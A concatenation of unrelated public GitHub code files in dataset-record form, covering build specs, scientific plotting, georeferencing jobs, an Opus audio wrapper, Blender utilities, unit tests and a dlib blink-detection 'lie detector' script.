Analysis(['playscii.py'],\n             pathex=['./'],\n             binaries=include_bins,\n             datas=include_files,\n             hiddenimports=[],\n             hookspath=None,\n             runtime_hooks=None,\n             excludes=None,\n             win_no_prefer_redirects=None,\n             win_private_assemblies=None,\n             cipher=block_cipher)\npyz = PYZ(a.pure, a.zipped_data,\n             
cipher=block_cipher)\nexe = EXE(pyz,\n a.scripts,\n exclude_binaries=True,\n name='playscii',\n debug=False,\n strip=None,\n upx=True,\n console=False )\ncoll = COLLECT(exe,\n a.binaries,\n a.zipfiles,\n a.datas,\n strip=None,\n upx=True,\n name='playscii')\napp = BUNDLE(coll,\n name='Playscii.app',\n icon='ui/playscii.icns',\n bundle_identifier='net.jplebreton.playscii')\n","repo_name":"michael-lazar/playscii","sub_path":"playscii_mac.spec","file_name":"playscii_mac.spec","file_ext":"spec","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"51"} +{"seq_id":"73915165597","text":"import os\nimport math\nimport csv\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nfsize = 20\n\nparas = 'False'\nreader = csv.DictReader(open('./data/both_ee_GS_varyingJ_size52_bcOO_sigma%s.csv' % paras, 'r'), delimiter=',')\n\nx = []\nbEE0 = []\nmEE0 = []\nfor row in reader:\n print(row)\n x.append(float(row['J']))\n bEE0.append(float(row['bee']))\n mEE0.append(float(row['mee']))\n\nparas = 'True'\nreader = csv.DictReader(open('./data/both_ee_GS_varyingJ_size52_bcOO_sigma%s.csv' % paras, 'r'), delimiter=',')\n\nbEE1 = []\nmEE1 = []\nfor row in reader:\n print(row)\n bEE1.append(float(row['bee']))\n mEE1.append(float(row['mee']))\n\nfig = plt.figure(figsize = (8, 4))\nmpl.rcParams['axes.linewidth'] = 1.5\nplt.rc('text', usetex=True)\n# plt.rc('font', family= 'serif')\n\nax1 = fig.add_subplot(121)\nax1.set_title('(a) $t$-$J$ model', fontsize=fsize, x=0.2, y=0.9)\nax1.set_xlim(0.0, 10.0)\nax1.set_ylim(0.5, 5.0)\n# ax.axvline(x=2.05, color='red', linestyle='-.', linewidth=1)\nax1.plot(x[1::2], bEE0[1::2], '->', color='blue', label='bEE', linewidth=0.5)\nax1.plot(x[1::2], mEE0[1::2], '-o', color='red', label='mEE', linewidth=0.5)\nax1.legend(loc='upper right', frameon=False, fontsize=fsize)\nax1.set_xlabel('$J/t$', fontsize=fsize)\n# ax1.set_yticklabels('', visible=False)\n# plt.setp(ax1.get_yticklabels(), visible=False)\n# plt.ylabel('spin current aplitude', fontsize=fs)\n# plt.setp(ax1.get_xticklabels(), fontsize=fs)\n# ax1.ticklabel_format(axis='y', style='sci', scilimits=(0, 0))\nax1.tick_params(axis='both', labelsize=fsize, direction='in')\n# ax1.tick_params('x', labelsize=16)\n# ax1.tick_params('y', labelsize=16)\n\nax2 = fig.add_subplot(122, sharey=ax1)\nax2.set_title('(b) $\\sigma\\cdot{t}$-$J$ model', fontsize=fsize, x=0.25, y=0.9)\nax2.set_xlim(0.0, 10.0)\nax2.set_ylim(0.0, 5.0)\nax2.plot(x[1::2], bEE1[1::2], '->', color='blue', label='bEE', linewidth=0.5)\nax2.plot(x[1::2], mEE1[1::2], '-o', color='red', label='mEE', linewidth=0.5)\nax2.legend(loc='upper right', frameon=False, fontsize=fsize)\nax2.set_xlabel('$J/t$', fontsize=fsize)\n# ax2.set_yticklabels('', visible=False)\nplt.setp(ax2.get_yticklabels(), visible=False)\nax2.tick_params(axis='both', labelsize=fsize, direction='in')\n\nimage = 'both_ee_GS_size52_varyingJ.pdf'\n# paras_image = (size, bounCon)\nfig.tight_layout()\nplt.savefig(image, format='PDF')\n# plt.show()\n","repo_name":"intuitionofmind/exact_diagonalization","sub_path":"one_hole_tjmodel_1d/py/plot_both_ee_varyingJ.py","file_name":"plot_both_ee_varyingJ.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10332915389","text":"import csv\r\ndata=[]\r\nwith open(\"NewData.csv\",\"r\") as f:\r\n csvReader=csv.reader(f)\r\n for row in csvReader:\r\n 
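        # collect every parsed row; data[0] becomes the header row and
        # data[1:] the planet records that are sorted further below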
data.append(row)\r\n\r\nheaders=data[0]\r\nplanetData=data[1:]\r\nfor dataPoints in planetData:\r\n dataPoints[0].lower()\r\nplanetData.sort(key=lambda planetData:planetData[0])\r\nwith open(\"SortedNewData.csv\",\"a+\") as f:\r\n csvWriter=csv.writer(f)\r\n csvWriter.writerow(headers)\r\n csvWriter.writerows(planetData)","repo_name":"JeeyaTalati/WebScrapping-1","sub_path":"SortedNewData.py","file_name":"SortedNewData.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"1076794862","text":"import os\nfrom georeference.settings import TEST_MODE\nfrom georeference.settings import GEOREFERENCE_PERSITENT_TMS\nfrom georeference.persistent.jobs.genericjobs import processGeorefImage\nfrom georeference.persistent.jobs.genericjobs import pushRecordToSearchIndex\nfrom georeference.utils.exceptions import GeoreferenceProcessingException\nfrom georeference.utils.process.tools import parseBoundingBoxPolygonFromFile\nfrom georeference.utils.process.tools import parseSRIDFromFile\nfrom georeference.scripts.updatetms import calculateCompressedTMS\n\n\ndef activate(georefObj, mapObj, dbsession, logger):\n \"\"\" This function activates a georeference process for a mapObj.\n\n :type georeference.models.vkdb.georeferenzierungsprozess.Georeferenzierungsprozess: georefObj\n :type georeference.models.vkdb.map.Map: mapObj\n :type sqlalchemy.orm.session.Session: dbSession\n :type logging.Logger: logger\n :return: string \"\"\"\n logger.debug('Activate georeference process with id %s ...'%georefObj.id)\n\n logger.debug('Create persistent georeference result ...')\n destPath = processGeorefImage(mapObj, georefObj, dbsession, logger)\n\n # check if the georeferencing was run correctly\n if destPath is None:\n logger.error('Something went wrong while trying to process a georeference process.')\n raise GeoreferenceProcessingException('Something went wrong while trying to process a georeference process.')\n\n logger.debug('Set map as active and update boundingbox ...')\n boundingboxFromFile = parseBoundingBoxPolygonFromFile(destPath)\n sridFromFile = parseSRIDFromFile(destPath)\n mapObj.setActive(destPath)\n mapObj.setBoundingBox(boundingboxFromFile, sridFromFile, dbsession)\n\n # for proper working of the mapping service update all pending database changes have to be commited\n if not TEST_MODE:\n dbsession.commit()\n\n # update the tile map service\n logger.info('Calculating tms cache ...')\n newTargetDirectory = os.path.join(GEOREFERENCE_PERSITENT_TMS, str(mapObj.maptype).lower())\n calculateCompressedTMS(destPath, newTargetDirectory)\n\n # push metadata record to elasticsearch index\n datarecordKey = pushRecordToSearchIndex(mapObj, dbsession, logger, georefObj)\n\n # push metadata to catalogue\n # this method has to be supported again\n # logger.debug('Push metadata record for map %s to cataloge service ...'%mapObj.id)\n # pushMapObjToCsw(mapObj, dbsession, logger)\n\n # update process\n georefObj.setActive()\n\n # flush session\n if TEST_MODE:\n dbsession.flush()\n\n return datarecordKey\n\ndef deactivate(georefObj, mapObj, dbsession, logger):\n \"\"\" This function deactivates a georeference process for a mapObj.\n\n :type georeference.models.vkdb.georeferenzierungsprozess.Georeferenzierungsprozess: georefObj\n :type georeference.models.vkdb.map.Map: mapObj\n :type sqlalchemy.orm.session.Session: dbSession\n :type logging.Logger: logger \"\"\"\n logger.debug('Deactivate georeference process with id %s 
...'%georefObj.id)\n\n # reset mapObj\n mapObj.setDeactive()\n\n # update metadata record from elasticsearch\n datarecordKey = pushRecordToSearchIndex(mapObj, dbsession, logger)\n\n # logger.debug('Remove metadata record from catalog instance ...')\n # removeMapObjFromCsw(mapObj, dbsession, logger)\n\n logger.debug('Deactivate job ...')\n georefObj.setDeactive()\n\n # flush session\n if TEST_MODE:\n dbsession.flush()","repo_name":"slub/vk2-georeference","sub_path":"georeference/persistent/jobs/georeferencejobs.py","file_name":"georeferencejobs.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"39816800594","text":"bunker_items = {category: {} for category in input().split(', ')}\n\nline_counter = int(input())\n\nfor line in range(line_counter):\n line = input().split(' - ')\n category = line[0]\n item_name = line[1]\n performance = line[2].split(';')\n quantity = performance[0]\n quality = performance[1]\n token_quantity = quantity.split(':')\n token_quality = quality.split(':')\n quantity = int(token_quantity[1])\n quality = int(token_quality[1])\n bunker_items[category][item_name] = (quantity, quality)\n\ncount_items = 0\nquality_sum = 0\ncategories_count = len(bunker_items)\n\nfor name, items in bunker_items.items():\n for item, value in items.items():\n count_items += value[0]\n quality_sum += value[1]\nprint(f'Count of items: {count_items}')\nprint(f'Average quality: {(quality_sum/categories_count):.2f}')\n\nfor name, items in bunker_items.items():\n print(f'{name} -> {\", \".join(items)}')","repo_name":"pavel-stoykov/python_advanced","sub_path":"Exercise_04/09.bunker.py","file_name":"09.bunker.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32816556943","text":"import array\nimport ctypes\n\nfrom utils.opus.exceptions import OpusException\n\n__author__ = 'Gareth Coles'\n\n\nclass EncoderStruct(ctypes.Structure):\n pass\n\n\nOK = 0\nAPPLICATION_AUDIO = 2049\nAPPLICATION_VOIP = 2048\nAPPLICATION_LOWDELAY = 2051\nCTL_SET_BITRATE = 4002\nCTL_SET_BANDWIDTH = 4008\n\n\nc_int_p = ctypes.POINTER(ctypes.c_int)\nc_int16_p = ctypes.POINTER(ctypes.c_int16)\nc_float_p = ctypes.POINTER(ctypes.c_float)\nEncoderStruct_p = ctypes.POINTER(EncoderStruct)\n\n\nFUNCTIONS = {\n \"opus_strerror\": ((ctypes.c_int, ), ctypes.c_char_p),\n\n # region: Encoder stuff\n \"opus_encoder_create\": (\n (ctypes.c_int, ctypes.c_int, ctypes.c_int, c_int_p),\n EncoderStruct_p\n ),\n \"opus_encode\": (\n (\n EncoderStruct_p, c_int16_p,\n ctypes.c_int, ctypes.c_char_p, ctypes.c_int32\n ),\n ctypes.c_int32\n ),\n \"opus_encoder_ctl\": (None, ctypes.c_int32),\n \"opus_encoder_destroy\": ((EncoderStruct_p, ), None),\n # endregion\n}\n\n\nclass OpusLibrary(object):\n lib = None\n\n def __init__(self):\n self.load_library(ctypes.util.find_library('opus'))\n self.setup_functions()\n\n def load_library(self, name):\n self.lib = ctypes.cdll.LoadLibrary(name)\n\n def setup_functions(self):\n for key, value in FUNCTIONS.iteritems():\n try:\n func = getattr(self.lib, key)\n except Exception:\n raise\n\n try:\n if value[0] is not None:\n func.argtypes = value[0]\n func.restype = value[1]\n except KeyError:\n pass\n\n def opus_strerror(self, code):\n return self.lib.opus_strerror(code)\n\n def opus_encoder_create(self, sampling_rate, channels, applications):\n return_value = ctypes.c_int()\n result = 
self.lib.opus_encoder_create(\n            sampling_rate, channels, applications, ctypes.byref(return_value)\n        )\n\n        if return_value.value != 0:\n            raise OpusException(return_value.value)\n\n        return result\n\n    def opus_encode(self, encoder, pcm, frame_size, data, max_data_bytes):\n        result = self.lib.opus_encode(\n            encoder, pcm, frame_size, data, max_data_bytes\n        )\n\n        if result < 0:\n            raise OpusException(result)\n\n        return array.array('b', data[:result]).tobytes()\n\n    def opus_encoder_ctl(self, encoder, *args):\n        result = self.lib.opus_encoder_ctl(encoder, *args)\n\n        if result < 0:\n            raise OpusException(result)\n\n        return result\n\n    def opus_encoder_destroy(self, encoder):\n        return self.lib.opus_encoder_destroy(encoder)\n\n\nopus = OpusLibrary()\n","repo_name":"UltrosBot/Ultros","sub_path":"utils/opus/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"60"} +{"seq_id":"13313960181","text":"import numpy as np\n\n\nclass FixedMultiStack:\n    NumberOfStack = 3\n    StackCapacity = 0\n    values = None\n    sizes = None\n\n    def __init__(self, stack_size):\n        self.values = np.zeros(stack_size * self.NumberOfStack)\n        # one size counter per stack; stacks are numbered 1..NumberOfStack\n        self.sizes = np.zeros(self.NumberOfStack + 1, dtype=int)\n        self.StackCapacity = stack_size\n\n    def stack_push(self, stack_no, value):\n        if self.is_fullstack(stack_no):\n            raise Exception(\"Stack Is Full\")\n        # each stack owns a contiguous block of StackCapacity slots\n        self.values[(stack_no - 1) * self.StackCapacity + self.sizes[stack_no]] = value\n        self.sizes[stack_no] += 1\n\n    def pop(self, stack_no):\n        if self.is_empty_stack(stack_no):\n            raise Exception(\"There Is No Element to Delete In Stack\")\n        val = self.values[self.index_top_of(stack_no)]\n        self.values[self.index_top_of(stack_no)] = 0\n        self.sizes[stack_no] -= 1\n        return val\n\n    def index_top_of(self, stack_no):\n        start = (stack_no - 1) * self.StackCapacity\n        size = self.sizes[stack_no]\n        return start + size - 1\n\n    def is_empty_stack(self, stack_no):\n        return self.sizes[stack_no] == 0\n\n    def is_fullstack(self, stack_no):\n        return self.sizes[stack_no] == self.StackCapacity\n\n\nif __name__ == '__main__':\n    a = FixedMultiStack(4)\n\n    a.stack_push(1,1)\n    a.stack_push(1,2)\n    a.stack_push(2,1)\n    a.stack_push(2,2)\n    a.stack_push(2,3)\n    a.stack_push(3,1)\n    a.stack_push(3,2)\n    a.pop(1)","repo_name":"kannan5/Algorithms-And-DataStructures","sub_path":"Stacks/FixedMultiSizeStack.py","file_name":"FixedMultiSizeStack.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28588544134","text":"# 2018_05_08_22_04_25\n\nimport bpy\nfrom blender_remap.libraries.blend_iterate import blend_iterate\n\n\n# ==========\n# Safe Delete\n# ==========\n#\n# ==========\n# Description:\n# ==========\n# Deletes a group, object, or material only if it has no references in a\n# particular directory.\n#\n# ==========\n# Usage:\n# ==========\n# Explained in main file.\n#\n# ==========\n# Inputs:\n# ==========\n# - data_type: 'MESH', 'GROUP', 'MATERIAL'.\n# - project_path: Absolute project directory path to be recursively\n#   searched for references.\n# - scripts_path: Absolute scripts directory path, where the\n#   accompanying scripts are stored.\n#\n# ==========\n# Return:\n# ==========\n# None.\n#\ndef safe_delete(data_type, project_path, scripts_path):\n    # ----------\n    # Variables.\n    # ----------\n\n    scene = bpy.context.scene\n    data = bpy.data\n    obj = scene.objects.active\n    script_path = scripts_path + \"\\\\\" + \"reference_check.py\"\n    err_internal_reference_found = 
\"Exiting script: Internal reference found.\"\n err_not_source = \"Exiting script: This file must be the source of the \" \\\n \"data being renamed.\"\n dupli_group = None\n mat = None\n\n # ----------\n\n # ----------\n # If group.\n # ----------\n if data_type == \"GROUP\":\n # ----------\n # Checks.\n # ----------\n\n if (obj.dupli_group is None) or (obj.dupli_type != \"GROUP\"):\n print(\n \"Exiting script: The selected object must be a DupliGroup of \"\n \"the group trying to be deleted, just so it can be selected.\")\n # Stop the script by returning.\n return\n\n # Check for internal references.\n for obj_iter in data.objects:\n if (\n (obj_iter.dupli_group is not None)\n and (obj_iter.dupli_group == obj.dupli_group)\n and (obj_iter != obj)\n ):\n print(err_internal_reference_found)\n # Stop the script by returning.\n return\n\n # Should it only work in the source file.\n if obj.dupli_group.library is not None:\n print(err_not_source)\n # Stop the script by returning.\n return\n\n # ----------\n\n name = obj.dupli_group.name\n dupli_group = obj.dupli_group\n # ----------\n # If mesh.\n # ----------\n elif data_type == \"MESH\":\n # ----------\n # Checks.\n # ----------\n\n # FIXME Need to determine whether this is the last user of a\n # material as well? Not going to do this right now because it would\n # require creating a batch version of 'reference_check.py'.\n\n if (obj.type != \"MESH\"):\n print(\"Exiting script: Data not of type 'MESH'.\")\n # Stop the script by returning.\n return\n elif obj.dupli_group is not None: # TODO Does this work to ensure\n # that the data is of a mesh only?\n print(\n \"Exiting script: The object data cannot have a DupliGroup \"\n \"associated with it.\")\n # Stop the script by returning.\n return\n\n # Should it only work in the source file.\n if obj.data.library is not None:\n print(err_not_source)\n # Stop the script by returning.\n return\n\n # Check for internal references.\n for obj_iter in data.objects: # TODO What if there is a fake mesh?\n if (obj_iter.data == obj.data) and (obj_iter != obj):\n print(err_internal_reference_found)\n # Stop the script by returning.\n return\n\n # ----------\n\n name = obj.data.name\n # ----------\n # If material.\n # ----------\n elif data_type == \"MATERIAL\":\n # ----------\n # Checks.\n # ----------\n\n mat = obj.active_material\n\n # Should it only work in the source file.\n if mat.library is not None:\n print(err_not_source)\n # Stop the script by returning.\n return\n\n # TODO Could use users_id to do this more quickly?\n # Check for internal references.\n for obj_iter in data.objects:\n if obj_iter != obj:\n for mat_iter in obj_iter.material_slots:\n if mat_iter.material == mat:\n print(err_internal_reference_found)\n # Stop the script by returning.\n return\n\n # ----------\n\n name = obj.active_material.name\n # ----------\n # If the data type given is not valid.\n # ----------\n else:\n print(\n \"Exiting script: '%s' is not a valid data type for this \"\n \"function, which are 'MESH', 'GROUP', or 'MATERIAL'.\" % data_type)\n # Stop the script by returning.\n return\n\n print(\"----------\")\n print(\"Checking for external references.\")\n\n # Find external references by iterating through the '.blend' files in\n # the 'project_path'.\n return_codes = blend_iterate(\n project_path, # Direct argument.\n script_path, # Direct argument.\n data.filepath, # Argument to pass on.\n data_type, # Argument to pass on.\n name # Argument to pass on.\n )\n\n # No references were found.\n for return_code_iter in 
return_codes:\n if return_code_iter == 1:\n print(\"----------\")\n print(\"Reference was found, not deleting.\")\n print(\"----------\")\n break\n # References were found.\n else:\n if data_type == \"GROUP\":\n print(\"----------\")\n print(\"Deleting group and the selected DupliGroup.\")\n print(\"----------\")\n data.groups.remove(dupli_group)\n # Also need to delete the selected object because it is a\n # DupliGroup that will lose its reference so definitely not\n # needed anymore.\n data.objects.remove(obj)\n elif data_type == \"MESH\":\n print(\"----------\")\n print(\"Deleting selected object.\")\n print(\"----------\")\n data.objects.remove(obj)\n elif data_type == \"MATERIAL\":\n print(\"----------\")\n print(\"Deleting selected material.\")\n print(\"----------\")\n\n # Not sure if the just the bottom of the two lines below is\n # necessary.\n data.materials.remove(mat)\n bpy.ops.object.material_slot_remove()\n pass\n\n # Update the scene just in case.\n bpy.context.scene.update()\n","repo_name":"KalciferKandari/blender_remap","sub_path":"libraries/safe_delete.py","file_name":"safe_delete.py","file_ext":"py","file_size_in_byte":6615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21296416906","text":"# solution feels a bit verbose but it's easy to\n# read and understand so I'm sticking with it\n\ndef first_max_elem(array_list):\n max_at_index = 0\n for index, element in enumerate(array_list):\n if len(element) > len(array_list[max_at_index]):\n max_at_index = index\n return array_list[max_at_index]\n\n\nn = int(input())\n\nintersections = []\n\nfor _ in range(n):\n first_range = set()\n second_range = set()\n first_intersec, second_intersec = input().split('-')\n\n start, end = [int(i) for i in first_intersec.split(',')]\n for num in range(start, end + 1):\n first_range.add(num)\n\n start, end = [int(i) for i in second_intersec.split(',')]\n for num in range(start, end + 1):\n second_range.add(num)\n\n intersections.append(list(first_range & second_range))\n\nlongest = first_max_elem(intersections)\n\nprint(f\"Longest intersection is {longest} with length {len(longest)}\")\n","repo_name":"ZhekoGinev/SoftUni","sub_path":"Python/02-python-advanced/02-tuples-and-sets/02-exercise/05-longest-intersection.py","file_name":"05-longest-intersection.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"60"} +{"seq_id":"23038078770","text":"#!/usr/bin/python3\n\"\"\"Function\"\"\"\n\n\nclass Student():\n \"\"\"Create class\"\"\"\n def __init__(self, first_name, last_name, age):\n self.first_name = first_name\n self.last_name = last_name\n self.age = age\n\n def to_json(self, attrs=None):\n \"\"\"same as 10-class_to_json.py\"\"\"\n if attrs is None:\n return self.__dict__\n lista = {}\n for i, c in self.__dict__.items():\n if i in attrs:\n lista[i] = c\n return lista\n","repo_name":"nicolasherrerac/holbertonschool-higher_level_programming","sub_path":"0x0B-python-input_output/10-student.py","file_name":"10-student.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"45928440249","text":"import numpy as np\nimport pdb\nfrom rich import print\n\nif __name__ == \"__main__\":\n datasets = [\"Artificial N=100, C=3, P=2\", \"Artificial N=1000, C=3, P=2\", \"Artificial N=1000, C=3, P=10\",\n \"Artificial N=1000, C=10, P=10\", \"Artificial N=10000, C=3, 
P=2\", \"Artificial N=10000, C=3, P=2\",\n \"Artificial N=100000, C=10, P=10\"]\n\n filenames = [\"matrix_depth2_full.txt\", \"matrix_depth3_full.txt\", \"matrix_depth4_full.txt\", \"matrix_depth5_full.txt\",\n \"matrix_depth6_full.txt\", \"matrix_depth7_full.txt\", \"matrix_depth8_full.txt\", \"matrix_depth9_full.txt\",\n \"tree_depth2_full.txt\", \"tree_depth3_full.txt\", \"tree_depth4_full.txt\", \"tree_depth5_full.txt\",\n \"tree_depth6_full.txt\", \"tree_depth7_full.txt\", \"tree_depth8_full.txt\", \"tree_depth9_full.txt\"]\n \n for filename in filenames:\n elapsed_times = []\n with open(f\"results/final/2023-01/time_trial/{filename}\", \"r\") as file:\n for line in file.readlines():\n if \"DATASET:\" in line:\n elapsed_times.append([])\n \n if \"Elapsed time\" in line:\n elapsed_times[-1].append(float(line.split(\": \")[-1]))\n\n print(f\"{'-'*50}\\nFilename: {filename}\\n\")\n for i, dataset in enumerate(datasets):\n if len(elapsed_times[i]) < 5:\n print(f\"[red]Less than 5 simulations!![/red]\")\n\n string = \"\"\n string += f\"DATASET: {dataset}\\n\"\n string += f\" Elapsed time: {'{:.3f}'.format(np.mean(elapsed_times[i][:5]))} ± {'{:.3f}'.format(np.std(elapsed_times[i][:5]))}\\n\" \n print(string)","repo_name":"vgarciasc/CRO-DT","sub_path":"experiment_downscaler.py","file_name":"experiment_downscaler.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73494985150","text":"import unittest\nimport numpy as np\n\nfrom basketballdetector.data import ClassificationDatasetBuilder, SegmentationDatasetBuilder\n\n\nclass ClassificationDatasetBuilderTestCase(unittest.TestCase):\n __NUMBER_OF_SAMPLES = 18\n __BUILDER = ClassificationDatasetBuilder('../assets/test-sample-data-classification', validation_percentage=0.5)\n\n def test_image_count(self):\n self.assertEqual(\n self.__BUILDER.number_of_images,\n self.__NUMBER_OF_SAMPLES,\n 'incorrect number of images detected'\n )\n\n def test_class_names(self):\n self.assertTrue(\n np.all(self.__BUILDER.class_names == ['ball', 'no_ball']),\n 'invalid object classes detected'\n )\n\n def test_validation_percentage(self):\n self.assertEqual(\n len(self.__BUILDER.train_dataset),\n self.__NUMBER_OF_SAMPLES / 2,\n 'train dataset was not split correctly'\n )\n self.assertEqual(\n len(self.__BUILDER.validation_dataset),\n self.__NUMBER_OF_SAMPLES / 2,\n 'validation dataset was not split correctly'\n )\n\n def test_dataset_labels(self):\n self.assertIn(\n self.__BUILDER.train_dataset.take(1).get_single_element()[1].numpy(),\n [0, 1],\n 'invalid class label in train dataset'\n )\n self.assertIn(\n self.__BUILDER.validation_dataset.take(1).get_single_element()[1].numpy(),\n [0, 1],\n 'invalid class label in validation dataset'\n )\n\n\nclass SegmentationDatasetBuilderTestCase(unittest.TestCase):\n __NUMBER_OF_SAMPLES = 36\n __BUILDER = SegmentationDatasetBuilder('../assets/test-sample-data-segmentation/', validation_percentage=0.5)\n\n def test_samples_count(self):\n self.assertEqual(\n self.__BUILDER.number_of_samples,\n self.__NUMBER_OF_SAMPLES,\n 'incorrect number of samples detected'\n )\n\n def test_validation_percentage(self):\n self.assertEqual(\n self.__BUILDER.train_dataset.cardinality().numpy(),\n self.__NUMBER_OF_SAMPLES / 2,\n 'train dataset was not split correctly'\n )\n self.assertEqual(\n self.__BUILDER.validation_dataset.cardinality().numpy(),\n self.__NUMBER_OF_SAMPLES / 2,\n 'validation dataset was not split correctly'\n 
)\n\n","repo_name":"peiva-git/basketball_detector_tf","sub_path":"tests/data/dataset_builder_tests.py","file_name":"dataset_builder_tests.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41274546402","text":"from scipy.spatial import distance as dist\nfrom imutils.video import FileVideoStream\nfrom imutils.video import VideoStream\nfrom imutils import face_utils\nimport numpy as np\nimport argparse\nimport imutils\nimport time\nimport dlib\nimport cv2\nimport datetime\n\ndef eye_aspect_ratio(eye):\n A = dist.euclidean(eye[1], eye[5])\n B = dist.euclidean(eye[2], eye[4])\n C = dist.euclidean(eye[0], eye[3])\n ear = (A + B) / (2.0 * C)\n return ear\n\ndef mouth_aspect_ratio(mouth):\n mA = dist.euclidean(mouth[13], mouth[19])\n mB = dist.euclidean(mouth[14], mouth[18])\n mC = dist.euclidean(mouth[15], mouth[17])\n # mD = dist.euclidean(mouth[4], mouth[8])\n # mE = dist.euclidean(mouth[5], mouth[7])\n mF = dist.euclidean(mouth[12], mouth[16])\n\n mar = (mA + mB + mC) / (3.0 * mF)\n return mar\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--shape-predictor\", required=True,\n help=\"path to facial landmark predictor\")\nap.add_argument(\"-v\", \"--video\", type=str, default=\"\",\n help=\"path to input video file\")\nargs = vars(ap.parse_args())\n\nMOUTH_AR_THRESH = 0.05\nEYE_AR_THRESH = 0.31\nMOUTH_AR_CONSEC_FRAMES = 3\nEYE_AR_CONSEC_FRAMES = 3\n\nframeCOUNTER = 0\nmCOUNTER = 0\neyeCOUNTER = 0\nmouthCOUNTER = 0\nTOTAL = 0\nmTOTAL = 0\nBlinkrate = 0\n\nprint(\"[INFO] loading facial landmark predictor...\")\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(args[\"shape_predictor\"])\n\n(lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"left_eye\"]\n(rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"right_eye\"]\n(mStart, mEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"mouth\"]\n\nif not args.get(\"video\", False):\n vs = VideoStream(src=0).start()\n fileStream = False\nelse:\n vs = FileVideoStream(args[\"video\"]).start()\n fileStream = True\ntime.sleep(1.0)\n\nearList = []\nwhile True:\n if fileStream and not vs.more():\n break\n frame = vs.read()\n frame = imutils.resize(frame, width=500)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n rects = detector(gray, 0)\n\n\n for rect in rects:\n shape = predictor(gray, rect)\n shape = face_utils.shape_to_np(shape)\n\n mouth = shape[mStart:mEnd]\n leftEye = shape[lStart:lEnd]\n rightEye = shape[rStart:rEnd]\n leftEAR = eye_aspect_ratio(leftEye)\n rightEAR = eye_aspect_ratio(rightEye)\n\n mar = mouth_aspect_ratio(mouth)\n ear = (leftEAR + rightEAR) / 2.0\n\n if frameCOUNTER <= 20:\n frameCOUNTER += 1\n else:\n frameCOUNTER = 0\n frameCOUNTER += 1\n earList.pop(0)\n \n earList.append(ear)\n earAverage = sum(earList) / len(earList)\n\n mouthHull = cv2.convexHull(mouth)\n leftEyeHull = cv2.convexHull(leftEye)\n rightEyeHull = cv2.convexHull(rightEye)\n cv2.drawContours(frame, [mouthHull], -1, (0, 255, 0), 1)\n cv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1)\n cv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1)\n\n if earAverage < EYE_AR_THRESH:\n eyeCOUNTER += 1\n cv2.putText(frame, \"Blinkrate: {:.2f}\".format(Blinkrate), (300, 60),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n if eyeCOUNTER == 1:\n t1 = datetime.datetime.now()\n\n else:\n cv2.putText(frame, \"Blinkrate: {:.2f}\".format(Blinkrate), (300, 60),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n if eyeCOUNTER >= 
EYE_AR_CONSEC_FRAMES:\n t2 = datetime.datetime.now()\n TOTAL += 1\n\n timeDiff = t2 - t1\n Blinkrate = (TOTAL / timeDiff.seconds) if timeDiff.seconds != 0 else 0\n\n eyeCOUNTER = 0\n\n if mar < MOUTH_AR_THRESH:\n mouthCOUNTER += 1\n\n elif mar >= MOUTH_AR_THRESH:\n mouthCOUNTER += 1\n if Blinkrate >= 1.25 * Blinkrate:\n # print(\"Lie\")\n cv2.putText(frame, 'Lie', (300, 90),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n else:\n # print(\"Truth\")\n cv2.putText(frame, 'Truth', (300, 90),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n\n cv2.putText(frame, \"Blinks: {}\".format(TOTAL), (10, 30),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n cv2.putText(frame, \"EAR: {:.2f}\".format(earAverage), (300, 30),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n cv2.putText(frame, \"MAR: {:.2f}\".format(mar), (10, 60),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n\n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1) & 0xFF\n\n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n 